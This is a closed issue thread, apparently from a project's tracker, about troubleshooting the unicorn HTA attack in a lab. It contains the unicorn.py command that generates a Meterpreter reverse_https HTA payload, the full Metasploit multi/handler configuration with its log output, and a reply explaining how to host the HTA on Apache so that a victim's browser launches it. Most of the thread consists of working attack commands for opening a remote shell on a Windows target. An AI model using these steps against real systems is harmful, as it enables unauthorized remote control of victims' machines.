Closed c0d3xpl0it closed 7 years ago
You are attempting to browse to port 443, where your payload is listening. You need to go into the hta attack folder, copy the index.html and the hta file to Apache, which is located under /var/www/html, and type services apache2 start. Once Apache is started, use the browser to browse via HTTP (not HTTPS) to the website to launch the HTA.
Team,
I am trying the HTA attack on my lab (Win 10/2012). But when I access https://192.168.1.5 on the victim end, I get the error below.
Server End: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
msf exploit(handler) >
[*] 192.168.1.100:41859 Request received for /...
[*] 192.168.1.100:41859 Unknown request to / #<Rex::Proto::Http::Request:0x0000000414c0b8 @headers={"Accept"=>"text/html, application/xhtml+xml, image/jxr, */*", "Host"=>"192.168.1.5", "Connection"=>"Keep-Alive", "Accept-Language"=>"en-IN", "User-Agent"=>"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586", "Accept-Encoding"=>"gzip, deflate"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GET", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...
[*] 192.168.1.100:41877 Request received for /...
[*] 192.168.1.100:41877 Unknown request to / #<Rex::Proto::Http::Request:0x0000000406e0b0 @headers={"Host"=>"192.168.1.5", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"en-us", "Connection"=>"keep-alive", "Accept-Encoding"=>"gzip, deflate", "User-Agent"=>"Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"}, @auto_cl=true, @state=3, @transfer_chunked=false, @inside_chunk=false, @bufq="", @body="", @method="GET", @raw_uri="/", @uri_parts={"QueryString"=>{}, "Resource"=>"/"}, @proto="1.1", @chunk_min_size=1, @chunk_max_size=10, @uri_encode_mode="hex-normal", @relative_resource="/", @body_bytes_left=0>...